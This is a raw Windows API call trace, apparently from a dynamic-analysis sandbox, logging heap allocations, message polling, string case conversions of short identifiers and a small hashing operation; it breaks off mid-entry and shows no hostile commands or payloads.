[0265.230] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0265.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.237] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.237] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.238] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.238] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.239] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.239] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.240] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.240] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.240] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.240] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0265.240] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.240] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.241] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.241] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.241] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.241] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.241] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.241] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.242] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.242] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.242] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.242] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.242] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.242] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.242] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.242] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.247] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.247] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.247] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.247] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.247] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.247] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.248] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.248] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.248] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.248] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.248] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.249] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.249] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.249] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.249] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.249] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.249] CryptHashData (hHash=0xaa59a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 